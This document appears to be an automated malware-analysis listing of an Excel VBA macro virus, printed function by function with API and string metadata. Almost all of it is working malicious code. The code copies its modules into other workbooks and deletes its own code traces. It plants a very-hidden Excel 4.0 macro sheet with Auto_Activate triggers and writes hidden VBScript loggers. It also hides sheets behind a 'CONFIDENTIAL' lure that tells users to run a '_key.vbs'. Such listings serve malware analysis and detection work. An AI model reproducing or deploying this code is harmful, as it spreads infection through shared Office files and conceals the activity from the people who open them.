                                                                                                                                                    Print # i, ""

                                                                                                                                                    409

                                                                                                                                                    Print # i, " Select Case input_frag"

                                                                                                                                                    410

                                                                                                                                                    Print # i, " Case 8"

                                                                                                                                                    411

                                                                                                                                                    Print # i, " Set logtext = objFSO.OpenTextFile(log_path & """ & "\log.txt""" & ", 8, True, -1)"

                                                                                                                                                    412

                                                                                                                                                    Print # i, " logtext.Write inputed_string"

                                                                                                                                                    413

                                                                                                                                                    Print # i, " logtext.Close"

                                                                                                                                                    414

                                                                                                                                                    Print # i, " Case 2"

                                                                                                                                                    415

                                                                                                                                                    Print # i, " Set logtext = objFSO.OpenTextFile(log_path & """ & "\log.txt""" & ", 2, True, -1)"

                                                                                                                                                    416

                                                                                                                                                    Print # i, " logtext.Write inputed_string"

                                                                                                                                                    417

                                                                                                                                                    Print # i, " logtext.Close"

                                                                                                                                                    418

                                                                                                                                                    Print # i, " End Select"

                                                                                                                                                    419

                                                                                                                                                    Print # i, " set objFSO = nothing"

                                                                                                                                                    420

                                                                                                                                                    Print # i, "End Sub"

                                                                                                                                                    421

                                                                                                                                                    Print # i, ""

                                                                                                                                                    422

                                                                                                                                                    Print # i, "Private Function ReadAllTextFile()"

                                                                                                                                                    423

                                                                                                                                                    Print # i, " Dim objFSO, FileName, MyFile"

                                                                                                                                                    424

                                                                                                                                                    Print # i, " FileName = """ & "D:\Collected_Address\log.txt""" & ""

                                                                                                                                                    425

                                                                                                                                                    Print # i, " Set objFSO = CreateObject(""" & "Scripting.FileSystemObject""" & ")"

                                                                                                                                                    426

                                                                                                                                                    Print # i, " Set MyFile = objFSO.OpenTextFile(FileName, 1, False, -1)"

                                                                                                                                                    427

                                                                                                                                                    Print # i, " If MyFile.AtEndOfStream Then"

                                                                                                                                                    428

                                                                                                                                                    Print # i, " ReadAllTextFile = """ & """" & ""

                                                                                                                                                    429

                                                                                                                                                    Print # i, " Else"

                                                                                                                                                    430

                                                                                                                                                    Print # i, " ReadAllTextFile = MyFile.ReadAll"

                                                                                                                                                    431

                                                                                                                                                    Print # i, " End If"

                                                                                                                                                    432

                                                                                                                                                    Print # i, "set objFSO = nothing"

                                                                                                                                                    433

                                                                                                                                                    Print # i, "End Function"

                                                                                                                                                    434

                                                                                                                                                    Print # i, ""

                                                                                                                                                    435

                                                                                                                                                    Print # i, "Private Function all_non_same(source_data)"

                                                                                                                                                    436

                                                                                                                                                    Print # i, " Dim oDict, i, trimed_arr, nonsame_arr"

                                                                                                                                                    437

                                                                                                                                                    Print # i, " all_non_same = """ & """" & ""

                                                                                                                                                    438

                                                                                                                                                    Print # i, " Set oDict = CreateObject(""" & "Scripting.Dictionary""" & ")"

                                                                                                                                                    439

                                                                                                                                                    Print # i, ""

                                                                                                                                                    440

                                                                                                                                                    Print # i, " trimed_arr = Split(source_data, vbCrLf)"

                                                                                                                                                    441

                                                                                                                                                    Print # i, ""

                                                                                                                                                    442

                                                                                                                                                    Print # i, " For i = LBound(trimed_arr) To UBound(trimed_arr)"

                                                                                                                                                    443

                                                                                                                                                    Print # i, " oDict(trimed_arr(i)) = """ & """" & ""

                                                                                                                                                    444

                                                                                                                                                    Print # i, " Next"

                                                                                                                                                    445

                                                                                                                                                    Print # i, ""

                                                                                                                                                    446

                                                                                                                                                    Print # i, " If oDict.Count > 0 Then"

                                                                                                                                                    447

                                                                                                                                                    Print # i, " nonsame_arr = oDict.keys"

                                                                                                                                                    448

                                                                                                                                                    Print # i, " For i = LBound(nonsame_arr) To UBound(nonsame_arr)"

                                                                                                                                                    449

                                                                                                                                                    Print # i, " all_non_same = all_non_same & nonsame_arr(i) & vbCrLf"

                                                                                                                                                    450

                                                                                                                                                    Print # i, " Next"

                                                                                                                                                    451

                                                                                                                                                    Print # i, " End If"

                                                                                                                                                    452

                                                                                                                                                    Print # i, " Set oDict = Nothing"

                                                                                                                                                    453

                                                                                                                                                    Print # i, "End Function"

                                                                                                                                                    454

                                                                                                                                                    Close (i)

                                                                                                                                                    455

                                                                                                                                                    Application.WindowState = xlMaximized

                                                                                                                                                    WindowState

                                                                                                                                                    xlMaximized

                                                                                                                                                    456

                                                                                                                                                    WshShell.Run ("wscript.exe " & AddVbsFile_search), vbHide, False

                                                                                                                                                    Run

                                                                                                                                                    vbHide

                                                                                                                                                    457

                                                                                                                                                    Set WshShell = Nothing

                                                                                                                                                    458

                                                                                                                                                    End Sub

                                                                                                                                                    Function

                                                                                                                                                    copymoduleAPIs: 39, Strings: 3, Number of lines: 82, Relevance: 75.332

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    Trim

                                                                                                                                                    vbNullString

                                                                                                                                                    Protection

                                                                                                                                                    vbext_pp_locked

                                                                                                                                                    Protection

                                                                                                                                                    vbext_pp_locked

                                                                                                                                                    VBComponents

                                                                                                                                                    Number

                                                                                                                                                    Err

                                                                                                                                                    Environ

                                                                                                                                                    Dir

                                                                                                                                                    vbNormal

                                                                                                                                                    vbHidden

                                                                                                                                                    vbSystem

                                                                                                                                                    vbNullString

                                                                                                                                                    Clear

                                                                                                                                                    Kill

                                                                                                                                                    Number

                                                                                                                                                    Err

                                                                                                                                                    Item

                                                                                                                                                    Clear

                                                                                                                                                    VBComponents

                                                                                                                                                    Number

                                                                                                                                                    Err

                                                                                                                                                    Number

                                                                                                                                                    Err

                                                                                                                                                    Export

                                                                                                                                                    InStrRev

                                                                                                                                                    InStrRev

                                                                                                                                                    Mid

                                                                                                                                                    VBComponents

                                                                                                                                                    Import

                                                                                                                                                    Type

                                                                                                                                                    vbext_ct_Document

                                                                                                                                                    Import

                                                                                                                                                    Lines

                                                                                                                                                    CodeModule

                                                                                                                                                    Remove

                                                                                                                                                    Kill

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "Temp"
                                                                                                                                                    "\"
                                                                                                                                                    "."
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    69

                                                                                                                                                    Function copymodule(ModuleName as String, FromVBProject as VBIDE.VBProject, ToVBProject as VBIDE.VBProject, OverwriteExisting as Boolean) as Boolean

                                                                                                                                                    74

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    76

                                                                                                                                                    Dim VBComp as VBIDE.VBComponent

                                                                                                                                                    77

                                                                                                                                                    Dim FName as String

                                                                                                                                                    78

                                                                                                                                                    Dim CompName as String

                                                                                                                                                    79

                                                                                                                                                    Dim S as String

                                                                                                                                                    80

                                                                                                                                                    Dim SlashPos as Long

                                                                                                                                                    81

                                                                                                                                                    Dim ExtPos as Long

                                                                                                                                                    82

                                                                                                                                                    Dim TempVBComp as VBIDE.VBComponent

                                                                                                                                                    84

                                                                                                                                                    If FromVBProject Is Nothing Then

                                                                                                                                                    85

                                                                                                                                                    copymodule = False

                                                                                                                                                    86

                                                                                                                                                    Exit Function

                                                                                                                                                    87

                                                                                                                                                    Endif

                                                                                                                                                    89

                                                                                                                                                    If Trim(ModuleName) = vbNullString Then

                                                                                                                                                    Trim

                                                                                                                                                    vbNullString

                                                                                                                                                    90

                                                                                                                                                    copymodule = False

                                                                                                                                                    91

                                                                                                                                                    Exit Function

                                                                                                                                                    92

                                                                                                                                                    Endif

                                                                                                                                                    94

                                                                                                                                                    If ToVBProject Is Nothing Then

                                                                                                                                                    95

                                                                                                                                                    copymodule = False

                                                                                                                                                    96

                                                                                                                                                    Exit Function

                                                                                                                                                    97

                                                                                                                                                    Endif

                                                                                                                                                    99

                                                                                                                                                    If FromVBProject.Protection = vbext_pp_locked Then

                                                                                                                                                    Protection

                                                                                                                                                    vbext_pp_locked

                                                                                                                                                    100

                                                                                                                                                    copymodule = False

                                                                                                                                                    101

                                                                                                                                                    Exit Function

                                                                                                                                                    102

                                                                                                                                                    Endif

                                                                                                                                                    104

                                                                                                                                                    If ToVBProject.Protection = vbext_pp_locked Then

                                                                                                                                                    Protection

                                                                                                                                                    vbext_pp_locked

                                                                                                                                                    105

                                                                                                                                                    copymodule = False

                                                                                                                                                    106

                                                                                                                                                    Exit Function

                                                                                                                                                    107

                                                                                                                                                    Endif

                                                                                                                                                    109

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    110

                                                                                                                                                    Set VBComp = FromVBProject.VBComponents(ModuleName)

                                                                                                                                                    VBComponents

                                                                                                                                                    111

                                                                                                                                                    If Err.Number <> 0 Then

                                                                                                                                                    Number

                                                                                                                                                    Err

                                                                                                                                                    112

                                                                                                                                                    copymodule = False

                                                                                                                                                    113

                                                                                                                                                    Exit Function

                                                                                                                                                    114

                                                                                                                                                    Endif

                                                                                                                                                    116

                                                                                                                                                    FName = Environ("Temp") & "\" & ModuleName & ".bas"

                                                                                                                                                    Environ

                                                                                                                                                    117

                                                                                                                                                    If OverwriteExisting = True Then

                                                                                                                                                    119

                                                                                                                                                    If Dir(FName, vbNormal + vbHidden + vbSystem) <> vbNullString Then

                                                                                                                                                    Dir

                                                                                                                                                    vbNormal

                                                                                                                                                    vbHidden

                                                                                                                                                    vbSystem

                                                                                                                                                    vbNullString

                                                                                                                                                    120

                                                                                                                                                    Err.Clear

                                                                                                                                                    Clear

                                                                                                                                                    121

                                                                                                                                                    Kill FName

                                                                                                                                                    Kill

                                                                                                                                                    122

                                                                                                                                                    If Err.Number <> 0 Then

                                                                                                                                                    Number

                                                                                                                                                    Err

                                                                                                                                                    123

                                                                                                                                                    copymodule = False

                                                                                                                                                    124

                                                                                                                                                    Exit Function

                                                                                                                                                    125

                                                                                                                                                    Endif

                                                                                                                                                    126

                                                                                                                                                    Endif

                                                                                                                                                    127

                                                                                                                                                    With ToVBProject.VBComponents

                                                                                                                                                    128

                                                                                                                                                    . Remove.Item (ModuleName)

                                                                                                                                                    Item

                                                                                                                                                    129

                                                                                                                                                    End With

                                                                                                                                                    130

                                                                                                                                                    Else

                                                                                                                                                    132

                                                                                                                                                    Err.Clear

                                                                                                                                                    Clear

                                                                                                                                                    133

                                                                                                                                                    Set VBComp = ToVBProject.VBComponents(ModuleName)

                                                                                                                                                    VBComponents

                                                                                                                                                    134

                                                                                                                                                    If Err.Number <> 0 Then

                                                                                                                                                    Number

                                                                                                                                                    Err

                                                                                                                                                    135

                                                                                                                                                    If Err.Number = 9 Then

                                                                                                                                                    Number

                                                                                                                                                    Err

                                                                                                                                                    137

                                                                                                                                                    Else

                                                                                                                                                    139

                                                                                                                                                    copymodule = False

                                                                                                                                                    140

                                                                                                                                                    Exit Function

                                                                                                                                                    141

                                                                                                                                                    Endif

                                                                                                                                                    142

                                                                                                                                                    Endif

                                                                                                                                                    143

                                                                                                                                                    Endif

                                                                                                                                                    145

                                                                                                                                                    FromVBProject.VBComponents(ModuleName).Export FileName := FName

                                                                                                                                                    Export

                                                                                                                                                    147

                                                                                                                                                    SlashPos = InStrRev(FName, "\")

                                                                                                                                                    InStrRev

                                                                                                                                                    148

                                                                                                                                                    ExtPos = InStrRev(FName, ".")

                                                                                                                                                    InStrRev

                                                                                                                                                    149

                                                                                                                                                    CompName = Mid(FName, SlashPos + 1, ExtPos - SlashPos - 1)

                                                                                                                                                    Mid

                                                                                                                                                    151

                                                                                                                                                    Set VBComp = Nothing

                                                                                                                                                    152

                                                                                                                                                    Set VBComp = ToVBProject.VBComponents(CompName)

                                                                                                                                                    VBComponents

                                                                                                                                                    154

                                                                                                                                                    If VBComp Is Nothing Then

                                                                                                                                                    155

                                                                                                                                                    ToVBProject.VBComponents.Import FileName := FName

                                                                                                                                                    Import

                                                                                                                                                    156

                                                                                                                                                    Else

                                                                                                                                                    157

                                                                                                                                                    If VBComp.Type = vbext_ct_Document Then

                                                                                                                                                    Type

                                                                                                                                                    vbext_ct_Document

                                                                                                                                                    159

                                                                                                                                                    Set TempVBComp = ToVBProject.VBComponents.Import(FName)

                                                                                                                                                    Import

                                                                                                                                                    161

                                                                                                                                                    With VBComp.CodeModule

                                                                                                                                                    162

                                                                                                                                                    . DeleteLines 1, . CountOfLines

                                                                                                                                                    163

                                                                                                                                                    S = TempVBComp.CodeModule.Lines(1, TempVBComp.CodeModule.CountOfLines)

                                                                                                                                                    Lines

                                                                                                                                                    CodeModule

                                                                                                                                                    164

                                                                                                                                                    . InsertLines 1, S

                                                                                                                                                    165

                                                                                                                                                    End With

                                                                                                                                                    166

                                                                                                                                                    On Error Goto 0

                                                                                                                                                    167

                                                                                                                                                    ToVBProject.VBComponents.Remove TempVBComp

                                                                                                                                                    Remove

                                                                                                                                                    168

                                                                                                                                                    Endif

                                                                                                                                                    169

                                                                                                                                                    Endif

                                                                                                                                                    170

                                                                                                                                                    Kill FName

                                                                                                                                                    Kill

                                                                                                                                                    171

                                                                                                                                                    copymodule = True

                                                                                                                                                    172

                                                                                                                                                    End Function

                                                                                                                                                    Subroutine

                                                                                                                                                    auto_openAPIs: 36, Strings: 2, Number of lines: 13, Relevance: 68.263

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    DisplayAlerts

                                                                                                                                                    Path

                                                                                                                                                    StartupPath

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    Part of subcall function delete_this_wk@ToDOLE: VBProject

                                                                                                                                                    Part of subcall function delete_this_wk@ToDOLE: VBComponents

                                                                                                                                                    Part of subcall function delete_this_wk@ToDOLE: CodeModule

                                                                                                                                                    Part of subcall function copytoworkbook@ToDOLE: DQUOTE

                                                                                                                                                    Sheets

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Select

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Add

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: xlExcel4MacroSheet

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Name

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Select

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: FormulaR1C1

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Select

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: FormulaR1C1

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: UserName

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Application

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Select

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: FormulaR1C1

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Chr

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Now

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Select

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: FormulaR1C1

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Select

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: FormulaR1C1

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Select

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: FormulaR1C1

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Sheets

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Add

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Name

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: Excel4MacroSheets

                                                                                                                                                    Part of subcall function Movemacro4@ToDOLE: xlSheetVeryHidden

                                                                                                                                                    Save

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "Macro1"
                                                                                                                                                    "Macro1"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    2

                                                                                                                                                    Private Sub auto_open()

                                                                                                                                                    3

                                                                                                                                                    Application.DisplayAlerts = False

                                                                                                                                                    DisplayAlerts

                                                                                                                                                    4

                                                                                                                                                    If ThisWorkbook.Path <> Application.StartupPath Then

                                                                                                                                                    Path

                                                                                                                                                    StartupPath

                                                                                                                                                    5

                                                                                                                                                    Application.ScreenUpdating = False

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    6

                                                                                                                                                    Call delete_this_wk()

                                                                                                                                                    7

                                                                                                                                                    Call copytoworkbook()

                                                                                                                                                    8

                                                                                                                                                    If Sheets(1).Name <> "Macro1" Then

                                                                                                                                                    Sheets

                                                                                                                                                    8

                                                                                                                                                    Movemacro4 ThisWorkbook

                                                                                                                                                    8

                                                                                                                                                    Endif

                                                                                                                                                    9

                                                                                                                                                    ThisWorkbook.Save

                                                                                                                                                    Save

                                                                                                                                                    10

                                                                                                                                                    Application.ScreenUpdating = True

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    11

                                                                                                                                                    Endif

                                                                                                                                                    12

                                                                                                                                                    End Sub

                                                                                                                                                    Subroutine

                                                                                                                                                    CreateFileAPIs: 14, Strings: 1, Number of lines: 17, Relevance: 28.017

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    CreateObject

                                                                                                                                                    Folderexists

                                                                                                                                                    Left

                                                                                                                                                    Len

                                                                                                                                                    CreateFolder

                                                                                                                                                    Left

                                                                                                                                                    Len

                                                                                                                                                    FileExists

                                                                                                                                                    OpenTextFile

                                                                                                                                                    Write

                                                                                                                                                    Close

                                                                                                                                                    OpenTextFile

                                                                                                                                                    Write

                                                                                                                                                    Close

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "scRiPTinG.fiLEsysTeMoBjEcT"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    640

                                                                                                                                                    Private Sub CreateFile(FragMark, pathf)

                                                                                                                                                    641

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    642

                                                                                                                                                    Dim Fso, FileText

                                                                                                                                                    643

                                                                                                                                                    Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")

                                                                                                                                                    CreateObject

                                                                                                                                                    644

                                                                                                                                                    If Fso.Folderexists(Left(pathf, Len(pathf) - 10)) = False Then

                                                                                                                                                    Folderexists

                                                                                                                                                    Left

                                                                                                                                                    Len

                                                                                                                                                    644

                                                                                                                                                    Fso.CreateFolder Left(pathf, Len(pathf) - 10)

                                                                                                                                                    CreateFolder

                                                                                                                                                    Left

                                                                                                                                                    Len

                                                                                                                                                    644

                                                                                                                                                    Endif

                                                                                                                                                    645

                                                                                                                                                    If Fso.FileExists(pathf) Then

                                                                                                                                                    FileExists

                                                                                                                                                    646

                                                                                                                                                    Set FileText = Fso.OpenTextFile(pathf, 2, False, - 1)

                                                                                                                                                    OpenTextFile

                                                                                                                                                    647

                                                                                                                                                    FileText.Write FragMark

                                                                                                                                                    Write

                                                                                                                                                    648

                                                                                                                                                    FileText.Close

                                                                                                                                                    Close

                                                                                                                                                    649

                                                                                                                                                    Else

                                                                                                                                                    650

                                                                                                                                                    Set FileText = Fso.OpenTextFile(pathf, 2, True, - 1)

                                                                                                                                                    OpenTextFile

                                                                                                                                                    651

                                                                                                                                                    FileText.Write FragMark

                                                                                                                                                    Write

                                                                                                                                                    652

                                                                                                                                                    FileText.Close

                                                                                                                                                    Close

                                                                                                                                                    653

                                                                                                                                                    Endif

                                                                                                                                                    654

                                                                                                                                                    End Sub

                                                                                                                                                    Subroutine

                                                                                                                                                    delete_this_wkAPIs: 3, Strings: 1, Number of lines: 11, Relevance: 8.761

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    VBProject

                                                                                                                                                    VBComponents

                                                                                                                                                    CodeModule

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "ThisWorkbook"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    37

                                                                                                                                                    Private Sub delete_this_wk()

                                                                                                                                                    38

                                                                                                                                                    Dim VBProj as VBIDE.VBProject

                                                                                                                                                    39

                                                                                                                                                    Dim VBComp as VBIDE.VBComponent

                                                                                                                                                    40

                                                                                                                                                    Dim CodeMod as VBIDE.CodeModule

                                                                                                                                                    42

                                                                                                                                                    Set VBProj = ThisWorkbook.VBProject

                                                                                                                                                    VBProject

                                                                                                                                                    43

                                                                                                                                                    Set VBComp = VBProj.VBComponents("ThisWorkbook")

                                                                                                                                                    VBComponents

                                                                                                                                                    44

                                                                                                                                                    Set CodeMod = VBComp.CodeModule

                                                                                                                                                    CodeModule

                                                                                                                                                    45

                                                                                                                                                    With CodeMod

                                                                                                                                                    46

                                                                                                                                                    . DeleteLines 1, . CountOfLines

                                                                                                                                                    47

                                                                                                                                                    End With

                                                                                                                                                    49

                                                                                                                                                    End Sub

                                                                                                                                                    Subroutine

                                                                                                                                                    RestoreBeforeSendAPIs: 31, Strings: 9, Number of lines: 36, Relevance: 60.036

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    DisplayAlerts

                                                                                                                                                    Names

                                                                                                                                                    Visible

                                                                                                                                                    Split

                                                                                                                                                    Delete

                                                                                                                                                    Sheets

                                                                                                                                                    Name

                                                                                                                                                    Visible

                                                                                                                                                    xlSheetVisible

                                                                                                                                                    Delete

                                                                                                                                                    Select

                                                                                                                                                    Add

                                                                                                                                                    Sheets

                                                                                                                                                    Name

                                                                                                                                                    Sheets

                                                                                                                                                    Visible

                                                                                                                                                    xlSheetVeryHidden

                                                                                                                                                    Int

                                                                                                                                                    Rnd

                                                                                                                                                    Int

                                                                                                                                                    Rnd

                                                                                                                                                    Chr

                                                                                                                                                    Left

                                                                                                                                                    Name

                                                                                                                                                    Len

                                                                                                                                                    Chr

                                                                                                                                                    Left

                                                                                                                                                    Name

                                                                                                                                                    Len

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "!"
                                                                                                                                                    "Auto_Activate"
                                                                                                                                                    "!"
                                                                                                                                                    "Auto_Activate"
                                                                                                                                                    "Macro1"
                                                                                                                                                    "Macro1"
                                                                                                                                                    "** CONFIDENTIAL! ** "
                                                                                                                                                    "Use ""
                                                                                                                                                    "\x8bf7\x7528 ""
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    657

                                                                                                                                                    Private Sub RestoreBeforeSend()

                                                                                                                                                    658

                                                                                                                                                    Dim aa as Name, i_row as Integer, i_col as Integer

                                                                                                                                                    659

                                                                                                                                                    Dim sht as Object

                                                                                                                                                    660

                                                                                                                                                    Application.ScreenUpdating = False

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    661

                                                                                                                                                    Application.DisplayAlerts = False

                                                                                                                                                    DisplayAlerts

                                                                                                                                                    662

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    663

                                                                                                                                                    For Each aa in ThisWorkbook.Names

                                                                                                                                                    Names

                                                                                                                                                    664

                                                                                                                                                    aa.Visible = True

                                                                                                                                                    Visible

                                                                                                                                                    665

                                                                                                                                                    If Split(aa.Name, "!")(1) = "Auto_Activate" Then

                                                                                                                                                    Split

                                                                                                                                                    665

                                                                                                                                                    aa.Delete

                                                                                                                                                    Delete

                                                                                                                                                    665

                                                                                                                                                    Endif

                                                                                                                                                    666

                                                                                                                                                    Next

                                                                                                                                                    Names

                                                                                                                                                    667

                                                                                                                                                    For Each sht in ThisWorkbook.Sheets

                                                                                                                                                    Sheets

                                                                                                                                                    668

                                                                                                                                                    If sht.Name = "Macro1" Then

                                                                                                                                                    Name

                                                                                                                                                    669

                                                                                                                                                    sht.Visible = xlSheetVisible

                                                                                                                                                    Visible

                                                                                                                                                    xlSheetVisible

                                                                                                                                                    670

                                                                                                                                                    sht.Delete

                                                                                                                                                    Delete

                                                                                                                                                    671

                                                                                                                                                    Endif

                                                                                                                                                    672

                                                                                                                                                    Next

                                                                                                                                                    Sheets

                                                                                                                                                    673

                                                                                                                                                    Sheets(1).Select

                                                                                                                                                    Select

                                                                                                                                                    674

                                                                                                                                                    Sheets.Add

                                                                                                                                                    Add

                                                                                                                                                    675

                                                                                                                                                    For Each sht in ThisWorkbook.Sheets

                                                                                                                                                    Sheets

                                                                                                                                                    676

                                                                                                                                                    If sht.Name <> Sheets(1).Name Then

                                                                                                                                                    Name

                                                                                                                                                    Sheets

                                                                                                                                                    676

                                                                                                                                                    sht.Visible = xlSheetVeryHidden

                                                                                                                                                    Visible

                                                                                                                                                    xlSheetVeryHidden

                                                                                                                                                    676

                                                                                                                                                    Endif

                                                                                                                                                    677

                                                                                                                                                    Next

                                                                                                                                                    Sheets

                                                                                                                                                    678

                                                                                                                                                    i_row = Int((15 * Rnd) + 1)

                                                                                                                                                    Int

                                                                                                                                                    Rnd

                                                                                                                                                    679

                                                                                                                                                    i_col = Int((6 * Rnd) + 1)

                                                                                                                                                    Int

                                                                                                                                                    Rnd

                                                                                                                                                    680

                                                                                                                                                    Cells(i_row, i_col) = "** CONFIDENTIAL! ** "

                                                                                                                                                    681

                                                                                                                                                    Cells(i_row + 2, i_col) = "Use " & Chr(34) & Left(ThisWorkbook.Name, Len(ThisWorkbook.Name) - 4) & "_key.vbs" & Chr(34) & " To Open This File."

                                                                                                                                                    Chr

                                                                                                                                                    Left

                                                                                                                                                    Name

                                                                                                                                                    Len

                                                                                                                                                    682

                                                                                                                                                    Cells(i_row + 3, i_col) = "\x8bf7\x7528 " & Chr(34) & Left(ThisWorkbook.Name, Len(ThisWorkbook.Name) - 4) & "_key.vbs" & Chr(34) & " \x89e3\x9501\x6b64\x6587\x4ef6."

                                                                                                                                                    Chr

                                                                                                                                                    Left

                                                                                                                                                    Name

                                                                                                                                                    Len

                                                                                                                                                    683

                                                                                                                                                    With Range(Cells(i_row, i_col), Cells(i_row + 2, i_col))

                                                                                                                                                    684

                                                                                                                                                    . Font.Bold = True

                                                                                                                                                    685

                                                                                                                                                    . Font.ColorIndex = 3

                                                                                                                                                    686

                                                                                                                                                    End With

                                                                                                                                                    687

                                                                                                                                                    Application.ScreenUpdating = True

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    688

                                                                                                                                                    End Sub

                                                                                                                                                    Subroutine

                                                                                                                                                    Movemacro4APIs: 25, Strings: 15, Number of lines: 23, Relevance: 60.023

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    Select

                                                                                                                                                    Add

                                                                                                                                                    xlExcel4MacroSheet

                                                                                                                                                    Name

                                                                                                                                                    Select

                                                                                                                                                    FormulaR1C1

                                                                                                                                                    Select

                                                                                                                                                    FormulaR1C1

                                                                                                                                                    UserName

                                                                                                                                                    Application

                                                                                                                                                    Select

                                                                                                                                                    FormulaR1C1

                                                                                                                                                    Chr

                                                                                                                                                    Now

                                                                                                                                                    Select

                                                                                                                                                    FormulaR1C1

                                                                                                                                                    Select

                                                                                                                                                    FormulaR1C1

                                                                                                                                                    Select

                                                                                                                                                    FormulaR1C1

                                                                                                                                                    Sheets

                                                                                                                                                    Add

                                                                                                                                                    Name

                                                                                                                                                    Excel4MacroSheets

                                                                                                                                                    xlSheetVeryHidden

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "Macro1"
                                                                                                                                                    "A2"
                                                                                                                                                    "=ERROR(FALSE)"
                                                                                                                                                    "A3"
                                                                                                                                                    "=IF(ERROR.TYPE(RUN("""
                                                                                                                                                    "A4"
                                                                                                                                                    ""=ALERT(""\x7981\x7528\x5b8f\xff0c\x5173\x95ed " "
                                                                                                                                                    "A5"
                                                                                                                                                    "=FILE.CLOSE(FALSE)"
                                                                                                                                                    "A6"
                                                                                                                                                    "=END.IF()"
                                                                                                                                                    "A7"
                                                                                                                                                    "=RETURN()"
                                                                                                                                                    "=Macro1!$A$2"
                                                                                                                                                    "=Macro1!$A$2"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    229

                                                                                                                                                    Private Sub Movemacro4(ByVal wb as Workbook)

                                                                                                                                                    230

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    232

                                                                                                                                                    Dim sht as Object

                                                                                                                                                    234

                                                                                                                                                    wb.Sheets(1).Select

                                                                                                                                                    Select

                                                                                                                                                    235

                                                                                                                                                    Sheets.Add Type := xlExcel4MacroSheet

                                                                                                                                                    Add

                                                                                                                                                    xlExcel4MacroSheet

                                                                                                                                                    236

                                                                                                                                                    ActiveSheet.Name = "Macro1"

                                                                                                                                                    Name

                                                                                                                                                    238

                                                                                                                                                    Range("A2").Select

                                                                                                                                                    Select

                                                                                                                                                    239

                                                                                                                                                    ActiveCell.FormulaR1C1 = "=ERROR(FALSE)"

                                                                                                                                                    FormulaR1C1

                                                                                                                                                    240

                                                                                                                                                    Range("A3").Select

                                                                                                                                                    Select

                                                                                                                                                    241

                                                                                                                                                    ActiveCell.FormulaR1C1 = "=IF(ERROR.TYPE(RUN(""" & Application.UserName & """))=4)"

                                                                                                                                                    FormulaR1C1

                                                                                                                                                    UserName

                                                                                                                                                    Application

                                                                                                                                                    242

                                                                                                                                                    Range("A4").Select

                                                                                                                                                    Select

                                                                                                                                                    243

                                                                                                                                                    ActiveCell.FormulaR1C1 = "=ALERT(""\x7981\x7528\x5b8f\xff0c\x5173\x95ed " & Chr(10) & Now & Chr(10) & "Please Enable Macro!"",3)"

                                                                                                                                                    FormulaR1C1

                                                                                                                                                    Chr

                                                                                                                                                    Now

                                                                                                                                                    244

                                                                                                                                                    Range("A5").Select

                                                                                                                                                    Select

                                                                                                                                                    245

                                                                                                                                                    ActiveCell.FormulaR1C1 = "=FILE.CLOSE(FALSE)"

                                                                                                                                                    FormulaR1C1

                                                                                                                                                    246

                                                                                                                                                    Range("A6").Select

                                                                                                                                                    Select

                                                                                                                                                    247

                                                                                                                                                    ActiveCell.FormulaR1C1 = "=END.IF()"

                                                                                                                                                    FormulaR1C1

                                                                                                                                                    248

                                                                                                                                                    Range("A7").Select

                                                                                                                                                    Select

                                                                                                                                                    249

                                                                                                                                                    ActiveCell.FormulaR1C1 = "=RETURN()"

                                                                                                                                                    FormulaR1C1

                                                                                                                                                    251

                                                                                                                                                    For Each sht in wb.Sheets

                                                                                                                                                    Sheets

                                                                                                                                                    252

                                                                                                                                                    wb.Names.Add sht.Name & "!Auto_Activate", "=Macro1!$A$2", False

                                                                                                                                                    Add

                                                                                                                                                    Name

                                                                                                                                                    253

                                                                                                                                                    Next

                                                                                                                                                    Sheets

